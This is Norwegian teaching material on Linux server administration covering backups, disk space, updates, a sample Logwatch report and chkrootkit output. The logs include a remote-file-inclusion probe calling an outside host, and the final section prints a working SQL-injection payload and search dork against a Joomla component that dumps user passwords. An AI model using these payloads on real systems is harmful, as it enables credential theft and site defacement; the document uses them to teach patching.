Driftsrutiner
Hvis vi skal snakke om driftsrutiner, må vi egentlig ha et nytt kurs.. Dette blir derfor bare noen små tips til hva man bør fokusere på..
Fysisk sikring
Jeg nevner det først, for det er mange som glemmer at dette faktisk er viktig. Oppbevar serveren på et fysisk innbruddssikkert og brannsikkert sted. Det er liten vits i å forsikre deg om maskinen din ikke kan hackes, hvis kjeltringer kan gå rett inn på serverrommet og hente maskinen eller en disk.
Gode backuprutiner
I laboppgave 1 lærte vi å ta backup av /etc katalogen. Dette er jo nærmest bare for morro skyld i forhold til hva man egentlig burde gjøre. Jevnlig backup av alle filområder er svært vikitg og en kritisk prosess for de som jobber med drifting av systemer. Utfordringen blir å ha gode nok tapestasjoner, og kunne ha plass til å ta backup av alle mp3 filer og filmer som folk laster ned.
Som drifter av et linuxsystem, bør du også huske å ta en “dump” av evt. MySQL databser jevnlig. Dette er eneste måten du er sikret at databasen er konsistent og “hel”.
Og husk – det hjelper lite å kunne ta backup av store filområder/databaser, hvis du ikke raskt kan kjøre restore av dataene. Dette bør testes jevnlig og man bør nærmest “ha det i fingrene”.
Pass på brukerne
Hvis du vil unngå trøbbel, la brukerne får installere minst mulig selv.. Hjelp de i stedet, for da vet du hva de installerer. Fokuser på å ha gode passordregler, og skift dem ofte.
Nok diskplass
Harddisker er blitt veldig rimelige, og en veldig vanlig bommert er å glemme å sjekke om det er ledig plass på disken. Dette sjekker du enkelt med kommandoen “df” (df – report file system disk space usage).
borrel@ask:~$ df -h Filesystem Size Used Avail Use% Mounted on /dev/sda1 1,8G 1,3G 460M 73% / tmpfs 1015M 0 1015M 0% /lib/init/rw udev 10M 92K 10M 1% /dev tmpfs 1015M 4,0K 1015M 1% /dev/shm /dev/sda2 897M 55M 795M 7% /boot /dev/sda5 4,6G 38M 4,4G 1% /felles /dev/sda9 9,2G 6,8G 2,0G 78% /home/ansatte /dev/sda10 14G 2,3G 11G 18% /home/spesielle /dev/sda14 214G 204G 0 100% /home/studenter /dev/sda7 4,6G 1,6G 2,9G 35% /local /dev/sda8 4,6G 1,2G 3,2G 27% /usr /dev/sda12 4,6G 4,1G 290M 94% /var /dev/sda11 9,2G 3,7G 5,1G 42% /var/mail
Så – litt senere:
torepeng@ask:~$ df -h
Filesystem Size Used Avail Use% Mounted on
/dev/sda1 1,8G 1,3G 460M 73% /
tmpfs 1015M 0 1015M 0% /lib/init/rw
udev 10M 92K 10M 1% /dev
tmpfs 1015M 4,0K 1015M 1% /dev/shm
/dev/sda2 897M 55M 795M 7% /boot
/dev/sda5 4,6G 38M 4,4G 1% /felles
/dev/sda9 9,2G 6,8G 2,0G 78% /home/ansatte
/dev/sda10 14G 5,1G 8,0G 39% /home/spesielle
/dev/sda14 214G 186G 18G 92% /home/studenter
/dev/sda7 4,6G 1,6G 2,9G 35% /local
/dev/sda8 4,6G 1,2G 3,2G 27% /usr
/dev/sda12 4,6G 4,2G 203M 96% /var
/dev/sda11 9,2G 3,7G 5,1G 42% /var/mail
Som vi ser er det svært viktig å partisjonere rikitg. I akkurat dette filfelle fungerte serveren videre selv om den ene partisjonen gikk full. Det eneste negative her er at studentene ikke fikk lagt utt websider..
Hold serveren oppdatert
En veldig stor andel av “innbrudd” på maskiner skyldes at programvare og tjenester som går på serveren ikke er oppdatert. Derfor: Pass alltid på at serveren er oppdatert. Lag deg egne lister over andre programmer som trengs manuelt vedlikehold. (ting som ikke lar seg installere med yum update). Følg også med på sikkerhetsforum på nettet, som sjekker for sårbarheter.
Logwatch
Logwatch skal dere være relativt kjent med (laboppgave 3). Det viktigste er at dere bruker dette verktøyet aktivt i hverdagen. En eller annen systemansvarlig/webansvarlig må ha ansvar for å sjekke at mailen leses.
Eks på rapport:
################### Logwatch 7.3 (03/24/06) ####################
Processing Initiated: Mon Apr 28 04:02:15 2008
Date Range Processed: yesterday
( 2008-Apr-27 )
Period is day.
Detail Level of Output: 5
Type of Output: unformatted
Logfiles for Host: TEST.hiof.no
##################################################################
--------------------- clam-update Begin ------------------------
The ClamAV update process was started 24 time(s)
Last ClamAV update process started at Sun Apr 27 23:13:51 2008
Last Status:
Querying current.cvd.clamav.net
TTL: 299
Software version from DNS: 0.93
WARNING: Your ClamAV installation is OUTDATED!
WARNING: Local version: 0.91.2 Recommended version: 0.93
DON'T PANIC! Read http://www.clamav.net/support/faq
main.cvd version from DNS: 46
main.inc is up to date (version: 46, sigs: 231834, f-level: 26, builder: sven)
daily.cvd version from DNS: 6973
daily.inc is up to date (version: 6973, sigs: 40963, f-level: 26, builder: ccordes)
Received signal: wake up
Max retries == 5
---------------------- clam-update End -------------------------
--------------------- httpd Begin ------------------------
265.97 MB transferred in 9734 responses (1xx 0, 2xx 8424, 3xx 1114, 4xx 92, 5xx 104)
1924 Images (32.25 MB),
2 Documents (1.63 MB),
7786 Content pages (231.82 MB),
22 Other (0.26 MB)
Requests with error response codes
400 Bad Request
/w00tw00t.at.ISC.SANS.DFind:): 2 Time(s)
404 Not Found
//update/update5.php?lang=http://www.cdpm3.com/test.txt???: 2 Time(s)
/component/: 2 Time(s)
/content/2104.html: 2 Time(s)
/content/2107.html: 2 Time(s)
/content/2111.html: 2 Time(s)
/content/2115.html: 2 Time(s)
/content/2118.html: 2 Time(s)
/content/2123.html: 2 Time(s)
/content/2125.html: 2 Time(s)
/content/2132.html: 2 Time(s)
/content/2134.html: 2 Time(s)
/content/2139.html: 2 Time(s)
/content/2144.html: 2 Time(s)
/content/6450.html: 2 Time(s)
/content/6452.html: 2 Time(s)
/content/6454.html: 2 Time(s)
/content/6457.html: 2 Time(s)
/content/6459.html: 2 Time(s)
/content/6461.html: 2 Time(s)
/content/6463.html: 2 Time(s)
/content/6465.html: 2 Time(s)
/content/6467.html: 2 Time(s)
/content/6469.html: 2 Time(s)
/content/6470.html: 2 Time(s)
/false;: 4 Time(s)
/flash/imageviewer/fadeimages_ws.swf: 2 Time(s)
/gallery/sarp03-04/bibliotek_1: 2 Time(s)
/gallery/sarp03-04/bibliotek_4: 2 Time(s)
/mms-blog/false;: 2 Time(s)
/rss-feeds/finance/: 2 Time(s)
/rss-feeds/linux/: 2 Time(s)
/static/fjernundervisning/: 2 Time(s)
/templates/247extender/favicon.ico: 24 Time(s)
500 Internal Server Error
/component/option,com_gallery2/Itemid,27/? ... ment.AddComment: 4 Time(s)
/static/gallery/main.php: 20 Time(s)
/static/gallery/main.php?g2_view=rss.Simpl ... &g2_itemId=5751: 2 Time(s)
/static/gallery/main.php?g2_view=rss.Simpl ... &g2_itemId=5769: 2 Time(s)
/static/gallery/main.php?g2_view=rss.Simpl ... &g2_itemId=5925: 2 Time(s)
/static/gallery/main.php?g2_view=rss.Simpl ... &g2_itemId=6031: 2 Time(s)
/static/gallery/main.php?g2_view=rss.Simpl ... &g2_itemId=6185: 2 Time(s)
/static/gallery/main.php?g2_view=rss.Simpl ... &g2_itemId=6239: 2 Time(s)
/static/gallery/main.php?g2_view=rss.Simpl ... &g2_itemId=6248: 2 Time(s)
/static/gallery/main.php?g2_view=rss.Simpl ... &g2_itemId=6272: 2 Time(s)
/static/gallery/main.php?g2_view=rss.Simpl ... &g2_itemId=6383: 2 Time(s)
/static/gallery/main.php?g2_view=rss.Simpl ... &g2_itemId=6467: 6 Time(s)
/static/gallery/main.php?g2_view=rss.Simpl ... &g2_itemId=6789: 4 Time(s)
/static/gallery/main.php?g2_view=rss.Simpl ... &g2_itemId=6798: 6 Time(s)
/static/gallery/main.php?g2_view=rss.Simpl ... &g2_itemId=6807: 4 Time(s)
/static/gallery/main.php?g2_view=rss.Simpl ... &g2_itemId=6824: 6 Time(s)
/static/gallery/main.php?g2_view=rss.Simpl ... &g2_itemId=6842: 4 Time(s)
/static/gallery/main.php?g2_view=rss.Simpl ... &g2_itemId=6882: 4 Time(s)
/static/gallery/main.php?g2_view=rss.Simpl ... &g2_itemId=6927: 4 Time(s)
/static/gallery/main.php?g2_view=rss.Simpl ... &g2_itemId=6973: 6 Time(s)
/static/gallery/main.php?g2_view=rss.Simpl ... &g2_itemId=7107: 4 Time(s)
/static/gallery/main.php?g2_view=rss.Simpl ... &g2_itemId=7137: 4 Time(s)
/static/gallery/main.php?g2_view=rss.Simpl ... &g2_itemId=7169: 4 Time(s)
/static/gallery/main.php?g2_view=rss.Simpl ... &g2_itemId=7341: 4 Time(s)
/static/gallery/main.php?g2_view=rss.Simpl ... &g2_itemId=8318: 2 Time(s)
A total of 14 ROBOTS were logged
---------------------- httpd End -------------------------
--------------------- IMAP Begin ------------------------
[IMAPd] Connections:
=========================
Host | Connections | SSL | Total
-------------------------------------- | ----------- | -------- | ---------
127.0.0.1 | 2 | 0 | 2
158.22.155.130 | 3 | 0 | 3
158.88.166.131 | 4 | 0 | 4
212.32.55.77 | 2 | 0 | 2
83.441.44.244 | 3 | 0 | 3
---------------------------------------------------------------------------
14 | 0 | 14
[IMAPd] Logout stats:
====================
User | Logouts | Downloaded | Mbox Size
--------------------------------------- | ------- | ---------- | ----------
??? | 2 | 0 | 0
hi11111l | 1 | 0 | 0
mm111er | 2 | 0 | 0
tor222ng | 5 | 0 | 0
toreeeng_noeeeeerk | 1 | 0 | 0
---------------------------------------------------------------------------
11 | 0 | 0
---------------------- IMAP End -------------------------
--------------------- iptables firewall Begin ------------------------
Dropped 54 packets on interface eth0
From 61.132.223.14 - 2 packets
To 158.39.165.72 - 2 packets
Service: ms-sql-m (udp/1434) (Shorewall:net2all:DROP:) - 2 packets
From 67.107.106.107 - 2 packets
To 158.39.165.72 - 2 packets
Service: 5900 (tcp/5900) (Shorewall:net2all:DROP:) - 2 packets
From 121.14.104.165 - 1 packet
To 158.39.165.72 - 1 packet
Service: ms-sql-m (udp/1434) (Shorewall:net2all:DROP:) - 1 packet
From 146.164.61.10 - 8 packets
To 158.39.165.72 - 8 packets
Service: 2967 (tcp/2967) (Shorewall:net2all:DROP:) - 4 packets
Service: 6129 (tcp/6129) (Shorewall:net2all:DROP:) - 4 packets
From 158.39.165.72 - 18 packets
To 158.39.165.255 - 18 packets
Service: 7741 (udp/7741) (Shorewall:net2all:DROP:) - 18 packets
From 158.39.165.145 - 18 packets
To 158.39.165.72 - 18 packets
Service: 7742 (udp/7742) (Shorewall:net2all:DROP:) - 18 packets
From 202.103.180.105 - 1 packet
To 158.39.165.72 - 1 packet
Service: ms-sql-m (udp/1434) (Shorewall:net2all:DROP:) - 1 packet
From 218.95.83.131 - 2 packets
To 158.39.165.72 - 2 packets
Service: 2967 (tcp/2967) (Shorewall:net2all:DROP:) - 2 packets
From 218.106.91.25 - 1 packet
To 158.39.165.72 - 1 packet
Service: ms-sql-m (udp/1434) (Shorewall:net2all:DROP:) - 1 packet
From 220.163.85.203 - 1 packet
To 158.39.165.72 - 1 packet
Service: ms-sql-m (udp/1434) (Shorewall:net2all:DROP:) - 1 packet
---------------------- iptables firewall End -------------------------
--------------------- Kernel Begin ------------------------
WARNING: Kernel Errors Present
end_request: I/O error, dev fd0, sector ...: 2 Time(s)
4 Time(s): ll header: ff:ff:ff:ff:ff:ff:00:17:f2:04:cc:f2:08:00
4 Time(s): martian source 158.39.165.255 from 158.39.165.72, on dev eth0
---------------------- Kernel End -------------------------
--------------------- MailScanner Begin ------------------------
MailScanner Status:
83 messages Scanned by MailScanner
557.5 Total KB
51 Spam messages detected by MailScanner
1 Content Problems found by MailScanner
34 Messages delivered by MailScanner
Content Report: (Total Seen = 1)
web bug tags: 1 Time(s)
---------------------- MailScanner End -------------------------
--------------------- pam_unix Begin ------------------------
crond:
Sessions Opened:
root: 154 Time(s)
su:
Sessions Opened:
torepeng(uid=500) -> root: 2 Time(s)
---------------------- pam_unix End -------------------------
--------------------- Connections (secure-log) Begin ------------------------
Connections:
Service ssh [Connection(s) per day]:
121.162.129.138: 36 Time(s)
158.32.1732.131: 2 Time(s)
Total Connections: 38
Service imap [Connection(s) per day]:
83.1841.20.333: 6 Time(s)
127.0.0.1 (test.htef.no): 4 Time(s)
158.39.244.13330: 6 Time(s)
158.39.244.1331: 8 Time(s)
212.32.55.77 (mail.ctl-eng.com): 4 Time(s)
Total Connections: 28
**Unmatched Entries**
msec: set variable SystemMenu to true in /etc/X11/gdm/gdm.conf
msec: set variable SystemMenu to true in /etc/X11/gdm/gdm.conf
msec: set variable SystemMenu to true in /etc/X11/gdm/gdm.conf
msec: set variable SystemMenu to true in /etc/X11/gdm/gdm.conf
msec: set variable SystemMenu to true in /etc/X11/gdm/gdm.conf
msec: set variable SystemMenu to true in /etc/X11/gdm/gdm.conf
msec: changed mode of /var/log/security/open_port.today from 644 to 640
msec: changed mode of /var/log/security/rpm-va-config.today from 644 to 640
msec: changed mode of /var/log/security/chkrootkit.today from 644 to 640
msec: changed mode of /var/log/security/suid_root.today from 644 to 640
msec: changed mode of /var/log/security/suid_md5.today from 644 to 640
msec: changed mode of /var/log/security/rpm-va.today from 644 to 640
msec: changed mode of /var/log/security/unowned_group.today from 644 to 640
msec: changed mode of /var/log/security/writable.today from 644 to 640
msec: changed mode of /var/log/security/rpm-qa.today from 644 to 640
msec: changed mode of /var/log/security/unowned_user.today from 644 to 640
msec: changed mode of /var/log/security/sgid.today from 644 to 640
msec: set variable SystemMenu to true in /etc/X11/gdm/gdm.conf
msec: set variable SystemMenu to true in /etc/X11/gdm/gdm.conf
msec: set variable SystemMenu to true in /etc/X11/gdm/gdm.conf
msec: set variable SystemMenu to true in /etc/X11/gdm/gdm.conf
msec: set variable SystemMenu to true in /etc/X11/gdm/gdm.conf
msec: set variable SystemMenu to true in /etc/X11/gdm/gdm.conf
msec: set variable SystemMenu to true in /etc/X11/gdm/gdm.conf
msec: set variable SystemMenu to true in /etc/X11/gdm/gdm.conf
msec: set variable SystemMenu to true in /etc/X11/gdm/gdm.conf
msec: set variable SystemMenu to true in /etc/X11/gdm/gdm.conf
msec: set variable SystemMenu to true in /etc/X11/gdm/gdm.conf
msec: set variable SystemMenu to true in /etc/X11/gdm/gdm.conf
msec: set variable SystemMenu to true in /etc/X11/gdm/gdm.conf
msec: set variable SystemMenu to true in /etc/X11/gdm/gdm.conf
msec: set variable SystemMenu to true in /etc/X11/gdm/gdm.conf
msec: set variable SystemMenu to true in /etc/X11/gdm/gdm.conf
msec: set variable SystemMenu to true in /etc/X11/gdm/gdm.conf
msec: set variable SystemMenu to true in /etc/X11/gdm/gdm.conf
---------------------- Connections (secure-log) End -------------------------
--------------------- sendmail Begin ------------------------
SENDMAIL CONFIGURATION
----------------------
Warning: STARTTLS file errors:
CRLFile missing
client: file /etc/ssl/sendmail/MYcert.pem unsafe: No such file or directory
No active milter filters
STATISTICS
----------
Bytes Transferred: 544074
Messages Processed: 89
Addressed Recipients: 89
SMTP SESSION, MESSAGE, OR RECIPIENT ERRORS
------------------------------------------
and they failed because of:
no certificate assigned
Lost input channel: [Occurrences >= 1]
[78.167.221.233] 1 Time(s)
75-130-179-226.dhcp.hlrg.nc.charter.com [75.130.179.226] 1 Time(s)
[217.219.170.202] 1 Time(s)
r190-135-187-59.dialup.adsl.anteldata.net.uy [190.135.187.59] 1 Time(s)
[65.87.252.79] 1 Time(s)
[210.124.129.214] 1 Time(s)
Total: 6
Client quit before communicating: [Occurrences >= 1]
[65.87.252.79] 1 Time(s)
[78.167.221.233] 1 Time(s)
r190-135-187-59.dialup.adsl.anteldata.net.uy [190.135.187.59] 1 Time(s)
Total: 3
STARTTLS failed to verify certificates:
self signed certificate in certificate chain: 1 Time(s)
Total: 1
Rejected mail: [Occurrences >= 1]
<nossemark.nossemark.se451 4.1.8 Domain of sender address
weqbaya@film-tv-connection.com does not resolve): 1 Time(s)
Total: 1
Mail Rejected:
RSET:
To: <nossemarknossemark.se>: 1 Time(s)
Total: 1
Total SMTP Session, Message, and Recipient Errors handled by Sendmail: 12
**Unmatched Entries**
STARTTLS=client, error: SSL_CTX_check_private_key failed(/etc/ssl/sendmail/MYkey.pem): 0: 34 Time(s)
STARTTLS=client, info: fds=9/8, err=2: 2 Time(s)
STARTTLS=read, info: fds=9/8, err=2: 2 Time(s)
---------------------- sendmail End -------------------------
--------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------
Large Mailbox threshold: 40MB (41943040 bytes)
Warning: Large mailbox: txxxxx_nccc (43633633)
---------------------- sendmail-largeboxes (large mail spool files) End -------------------------
--------------------- SSHD Begin ------------------------
Failed logins from:
121.162.129.138: 12 times
root/password: 12 times
Illegal users from:
121.162.129.138: 24 times
admin/password: 8 times
test/password: 8 times
guest/password: 4 times
user/password: 4 times
Users logging in through sshd:
torepeng:
158.33.1333.1331: 2 times
Could not get shadow information for:
NOUSER : 24 Time(s)
---------------------- SSHD End -------------------------
--------------------- Disk Space Begin ------------------------
Filesystem Size Used Avail Use% Mounted on
/dev/hda6 22G 7.6G 13G 38% /
/dev/hdc6 58G 29G 30G 50% /backup
/dev/hda5 49G 37G 12G 76% /home
---------------------- Disk Space End -------------------------
###################### Logwatch End #########################
Som vi ser er det også default satt opp en oversikt over hvor mye diskplass som til stadighet benyttes.
Chkrootkit
Chkrootkit er et lite program for å sjekke om maskinen din er “hacket”, og om vedkommende evt har installert et “rootkit” der. Ønsker du å vite mer om rootkit, les mer på Wikipedia sine sider. Chkrootkit kan installeres med “yum install chkrootkit”. Når det er gjort kjører du kommandoen “chkrootkit”. Da vil den scanne maskinen og forsøke å sjekke om den har installert noen rootkit der.
Eks på resultat fra chkrootkit:
neted1:/etc/cron.daily# chkrootkit
ROOTDIR is `/’
Checking `amd’… not found
Checking `basename’… not infected
Checking `biff’… not found
Checking `chfn’… not infected
Checking `chsh’… not infected
Checking `cron’… not infected
Checking `crontab’… not infected
Checking `date’… not infected
Checking `du’… not infected
Checking `dirname’… not infected
Checking `echo’… not infected
Checking `egrep’… not infected
Checking `env’… not infected
Checking `find’… not infected
Checking `fingerd’… not found
Checking `gpm’… not found
Checking `grep’… not infected
Checking `hdparm’… not found
Checking `su’… not infected
Checking `ifconfig’… not infected
Checking `inetd’… not infected
Checking `inetdconf’… not infected
Checking `identd’… not found
Checking `init’… not infected
Checking `killall’… not infected
Checking `ldsopreload’… not infected
Checking `login’… not infected
Checking `ls’… not infected
Checking `lsof’… not infected
Checking `mail’… not infected
Checking `mingetty’… not found
Checking `netstat’… not infected
Checking `named’… not found
Checking `passwd’… not infected
Checking `pidof’… not infected
Checking `pop2’… not found
Checking `pop3’… not found
Checking `ps’… not infected
Checking `pstree’… not infected
Checking `rpcinfo’… not infected
Checking `rlogind’… not found
Checking `rshd’… not found
Checking `slogin’… not infected
Checking `sendmail’… not infected
Checking `sshd’… not infected
Checking `syslogd’… not infected
Checking `tar’… not infected
Checking `tcpd’… not infected
Checking `tcpdump’… not infected
Checking `top’… not infected
Checking `telnetd’… not found
Checking `timed’… not found
Checking `traceroute’… not infected
Checking `vdir’… not infected
Checking `w’… not infected
Checking `write’… not infected
Checking `aliens’… no suspect files
Searching for sniffer’s logs, it may take a while… nothing found
Searching for HiDrootkit’s default dir… nothing found
Searching for t0rn’s default files and dirs… nothing found
Searching for t0rn’s v8 defaults… nothing found
Searching for Lion Worm default files and dirs… nothing found
Searching for RSHA’s default files and dir… nothing found
Searching for RH-Sharpe’s default files… nothing found
Searching for Ambient’s rootkit (ark) default files and dirs… nothing found
Searching for suspicious files and dirs, it may take a while…
/lib/init/rw/.ramfsSearching for LPD Worm files and dirs… nothing found
Searching for Ramen Worm files and dirs… nothing found
Searching for Maniac files and dirs… nothing found
Searching for RK17 files and dirs… nothing found
Searching for Ducoci rootkit… nothing found
Searching for Adore Worm… nothing found
Searching for ShitC Worm… nothing found
Searching for Omega Worm… nothing found
Searching for Sadmind/IIS Worm… nothing found
Searching for MonKit… nothing found
Searching for Showtee… nothing found
Searching for OpticKit… nothing found
Searching for T.R.K… nothing found
Searching for Mithra… nothing found
Searching for OBSD rk v1… nothing found
Searching for LOC rootkit… nothing found
Searching for Romanian rootkit… nothing found
Searching for Suckit rootkit… nothing found
Searching for Volc rootkit… nothing found
Searching for Gold2 rootkit… nothing found
Searching for TC2 Worm default files and dirs… nothing found
Searching for Anonoying rootkit default files and dirs… nothing found
Searching for ZK rootkit default files and dirs… nothing found
Searching for ShKit rootkit default files and dirs… nothing found
Searching for AjaKit rootkit default files and dirs… nothing found
Searching for zaRwT rootkit default files and dirs… nothing found
Searching for Madalin rootkit default files… nothing found
Searching for Fu rootkit default files… nothing found
Searching for ESRK rootkit default files… nothing found
Searching for rootedoor… nothing found
Searching for ENYELKM rootkit default files… nothing found
Searching for anomalies in shell history files… Warning: `//root/.mysql_history’ file size is zero
Checking `asp’… not infected
Checking `bindshell’… not infected
Checking `lkm’… chkproc: nothing detected
Checking `rexedcs’… not found
Checking `sniffer’… lo: not promisc and no packet sniffer sockets
eth0: not promisc and no packet sniffer sockets
Checking `w55808’… not infected
Checking `wted’… chkwtmp: nothing deleted
Checking `scalper’… not infected
Checking `slapper’… not infected
Checking `z2’… chklastlog: nothing deleted
Her har den først gått igjennom standardtjenester/kommandoer, og sjekket om disse er byttet ut.
Er maskinen din hacket, og det er installert et rootkit på den, må du IKKE stole på de vanlige kommandoene som finnes.
Eks: kommandoen “w”:
torepeng@ask:~$ w
12:06:37 up 76 days, 2:53, 3 users, load average: 0,06, 0,10, 0,08
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
tms pts/0 pc164-106.hiof.n 09:16 6:19m 0.14s 0.02s sshd: tms [priv]
hansob pts/2 hob.hiof.no 09:38 1:54 0.01s 0.00s sshd: hansob [priv]
torepeng pts/3 pc165-110.hiof.n 11:46 0.00s 0.01s 0.00s w
Her lister jeg opp tre brukere som skal være pålogget. I realiteten kunne det vært 4 brukere, men den ene brukeren kunne da vært skjult (fordi den originale w kommandoen er byttet ut med et skreddersydd ny w kommando, som skuler den ondsinnede brukeren). Dette er selvsagt gjort fordi jeg som systemansvarlig ikke skal skjønne at noe er galt. Ser jeg brukeren “evil_user”, vil jeg jo mistenke at noe er galt.
Husk å oppdatere webapplikasjoner
Standard Open Source webapplikasjoner som Joomla, PHPMyAdmin, phpBB, Gallery osv osv. er yndede mål for hackere – og spesielt scriptkiddies. Siden kildekoden er kjent, er det jo viktig at koden er god. I forhold til Joomla (som jeg kjenner best), så er det stort sett tilleggskomponenter som ikke følger med i utviklingen. Joomla kan utvides med en haug med slike komponenter, og hvis man ikke oppdaterer disse, ligger man ille an.
Eksempel -Sikkerhetshull i en komponent i Joomla:
Joomla Component com_gmaps
Dork:
“index.php?option=com_gmaps”Expl:
index.php?option=com_gmaps&task=viewmap&Itemid=57&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*
På en eldre Joomla installasjon, med en gammle utgave av komponenten com_gmaps installert, holdt det med å kjøre den nederste koden for å få frem passord.. Deretter var det bare å logge seg på maskinen og endre websider.
Indikasjoner på hacket maskin?
- Unormalt mye trafikk på maskinen – Sjekkes med “netstat”.
- Mail fra en eller annen abuse liste
- Du blir stengt ute av din egen server
- Noen ganger håpløst å finne ut av.